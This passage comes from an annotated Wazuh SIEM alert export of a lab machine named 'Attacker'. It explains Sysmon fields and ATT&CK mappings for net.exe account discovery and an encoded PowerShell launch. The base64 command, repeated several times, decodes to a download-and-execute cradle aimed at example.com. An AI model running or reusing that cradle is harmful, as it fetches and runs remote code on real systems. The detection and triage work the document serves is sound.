No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  C:\\WINDOWS\\system32\\net1 user administrator
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcc5-680a-b10a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  12028
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  net user administrator
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:55.508+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:55.508+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  20
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534215.991423
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:52.6827009Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282279
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:35:50.858 ProcessGuid: {94294ddc-bcc6-680a-b30a-000000000e00} ProcessId: 9592 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bcc2-680a-ae0a-000000000e00} ParentProcessId: 1148 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:35:50.858
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcc6-680a-b30a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  9592
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcc2-680a-ae0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  1148
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:55.509+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:55.509+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  24
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534215.999485
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:52.8943928Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282280
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:35:52.870 ProcessGuid: {94294ddc-bcc6-680a-b30a-000000000e00} ProcessId: 9592 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_mqh0ir2i.w0v.ps1 CreationUtcTime: 2025-04-24 22:35:52.870 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:35:52.870
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcc6-680a-b30a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  9592
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_mqh0ir2i.w0v.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:35:52.870
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

A net.exe account discovery command was initiated

🧠 What happened? A net.exe account discovery command was initiated

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:36:55.851+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:55.851+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  A net.exe account discovery command was initiated
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92039
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534215.1002249
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:53.9716064Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282297
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:35:53.953 ProcessGuid: {94294ddc-bcc9-680a-b80a-000000000e00} ProcessId: 11604 Image: C:\Windows\SysWOW64\net.exe FileVersion: 10.0.26100.1882 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net.exe CommandLine: net user guest CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} ParentProcessId: 3244 ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe" ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:35:53.953
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcc9-680a-b80a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11604
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1882 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  net user guest
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-ea88-67fe-4900-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  3244
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

A net.exe account discovery command was initiated

🧠 What happened? A net.exe account discovery command was initiated

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:36:55.880+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:55.880+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  A net.exe account discovery command was initiated
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92039
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  4
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534215.1007500
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:54.1048194Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282300
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:35:54.098 ProcessGuid: {94294ddc-bcca-680a-ba0a-000000000e00} ProcessId: 4036 Image: C:\Windows\SysWOW64\net1.exe FileVersion: 10.0.26100.1 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net1.exe CommandLine: C:\WINDOWS\system32\net1 user guest CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 ParentProcessGuid: {94294ddc-bcc9-680a-b80a-000000000e00} ParentProcessId: 11604 ParentImage: C:\Windows\SysWOW64\net.exe ParentCommandLine: net user guest ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:35:54.098
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcca-680a-ba0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  4036
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  C:\\WINDOWS\\system32\\net1 user guest
